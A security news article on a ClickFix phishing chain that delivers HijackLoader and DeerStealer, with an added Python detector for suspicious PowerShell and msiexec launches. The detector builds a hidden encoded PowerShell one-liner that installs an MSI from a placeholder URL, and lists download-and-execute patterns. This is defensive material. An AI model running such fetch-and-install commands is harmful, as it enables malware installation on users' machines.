Security researchers have identified a new phishing campaign in which the ClickFix social-engineering technique is used to trick victims into running a malicious command that installs HijackLoader, which in turn deploys the DeerStealer infostealer.
eSentire's Threat Response Unit (TRU) documented the attack chain, which begins with ClickFix for initial access. Victims land on a phishing page that instructs them to paste a PowerShell command into the Windows Run prompt (Win+R). That command downloads an installer named now.msi, which sets off a sequence of stages that ends with HijackLoader running on the host and delivering the DeerStealer payload.
HijackLoader, active since 2023, is known for its use of steganography: it hides its configuration data inside PNG images. Once running, the loader abuses legitimate, signed binaries to load unsigned malicious code (DLL sideloading), paving the way for DeerStealer to be injected into memory.
DeerStealer, sold in dark-web circles under the name XFiles Spyware, is a subscription-based infostealer whose capabilities go well beyond basic credential harvesting. It can extract data from more than 50 web browsers, target 14+ types of cryptocurrency wallets (including through clipboard monitoring), harvest credentials from a range of messaging platforms, and give operators covert remote access through a hidden VNC (hVNC) component. Its command-and-control traffic travels over HTTPS, which blends with ordinary web traffic and makes network-level detection and analysis harder.
The attack chain is a series of encoded commands that fetch the installer; the installer then runs a legitimately signed COMODO binary that sideloads a tampered DLL, hijacking the binary's execution flow. Even though tools to decode HijackLoader's configuration are publicly available, attackers keep using the loader, which suggests it still works well enough in practice that its exposure to analysis is an acceptable cost to them.
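As an added example (not code from eSentire's report, and not the malware's own code), the following Python script shows the detection logic that the chain above implies: it scans process-creation records, decodes a PowerShell -EncodedCommand argument (base64 of UTF-16LE, the same encoding the Run-prompt one-liner uses), and flags a script host launched from explorer.exe with download indicators, or msiexec installing a package from a URL. The event records, their Sysmon-style field names and the example.invalid URL are constructed for illustration and are assumptions, not observed telemetry.

```python
"""Detect ClickFix-style PowerShell launches in process-creation telemetry.

Added example. The events below are constructed, not telemetry from the
eSentire investigation; field names follow the Sysmon Event ID 1 layout
(ParentImage, Image, CommandLine) but that layout is an assumption.
"""
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Strings that suggest a command fetches or runs remote content.
PAYLOAD_INDICATORS = [
    r"https?://",
    r"\bmsiexec\b",
    r"invoke-webrequest|\biwr\b|\bcurl\b",
    r"downloadstring|downloadfile",
    r"invoke-expression|\biex\b",
    r"-w(?:indowstyle)?\s+hidden",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc).
ENC_ARG = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})")


def encode_powershell_command(command: str) -> str:
    """Produce the -EncodedCommand form PowerShell expects: base64 of UTF-16LE."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded -enc payload, or None if the command line has none."""
    m = ENC_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_event(event: dict) -> dict:
    """Score one process-creation event; returns reasons and any decoded payload."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    text_to_scan = cmdline + ("\n" + decoded if decoded else "")

    reasons = []
    # The Run prompt (Win+R) is hosted by explorer.exe, so a script host whose
    # parent is explorer.exe matches a user pasting a ClickFix command. Alone it
    # is a weak signal (double-clicking a .lnk gives the same parent).
    if parent == "explorer.exe" and image in SCRIPT_HOSTS:
        reasons.append("script host launched from explorer.exe (Run prompt / shortcut)")
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    for pattern in PAYLOAD_INDICATORS:
        if re.search(pattern, text_to_scan, re.IGNORECASE):
            reasons.append(f"payload indicator: {pattern}")
    if image == "msiexec.exe" and re.search(r"https?://", cmdline, re.IGNORECASE):
        reasons.append("msiexec installing a package from a URL")

    # Require the launch context AND a payload indicator, or a remote MSI install
    # on its own, so routine admin PowerShell does not page anyone.
    launch_ctx = any(r.startswith("script host") for r in reasons)
    payload = any(r.startswith(("payload", "encoded")) for r in reasons)
    remote_msi = any(r.startswith("msiexec") for r in reasons)
    return {"suspicious": (launch_ctx and payload) or remote_msi,
            "reasons": reasons, "decoded_command": decoded}


# Constructed stage-one command; the URL is a placeholder, not a real IOC.
STAGE_ONE = "msiexec /i https://example.invalid/now.msi /qn"

SAMPLE_EVENTS = [  # constructed records
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + encode_powershell_command(STAGE_ONE)},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": STAGE_ONE},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File build.ps1"},
]


def find_suspicious(events):
    """Return indices of events that look like ClickFix / remote-MSI activity."""
    return [i for i, ev in enumerate(events) if analyze_event(ev)["suspicious"]]


if __name__ == "__main__":
    for i in find_suspicious(SAMPLE_EVENTS):
        result = analyze_event(SAMPLE_EVENTS[i])
        print(i, result["reasons"], result["decoded_command"])
```

Run against the constructed records, the script flags the encoded PowerShell launch from explorer.exe (decoding it to the msiexec stage) and the msiexec process fetching now.msi from a URL, while leaving the notepad launch and the editor-spawned build script alone. Feeding it real Sysmon or EDR process events only requires mapping their field names onto the three used here.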
eSentire has cautioned that DeerStealer is under active development, with planned additions including macOS support, AI-driven improvements, and an expanded set of targeted applications. Threat actors who pay for higher-priced tiers, up to $3,000 per month, get features such as re-encryption, payload signing, and advanced customization.
In light of these developments, eSentire's TRU advises organizations to maintain continuous threat monitoring and keep endpoint protection updated so that emerging loaders and stealers are caught before they do damage. For this chain in particular, that means alerting on script hosts spawned by explorer.exe with encoded or download-capable command lines and on msiexec installing packages from a URL; on a suspected host, the Run-prompt history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU preserves what the user pasted. As cyber threats become more sophisticated, staying vigilant is crucial to safeguarding sensitive data and systems.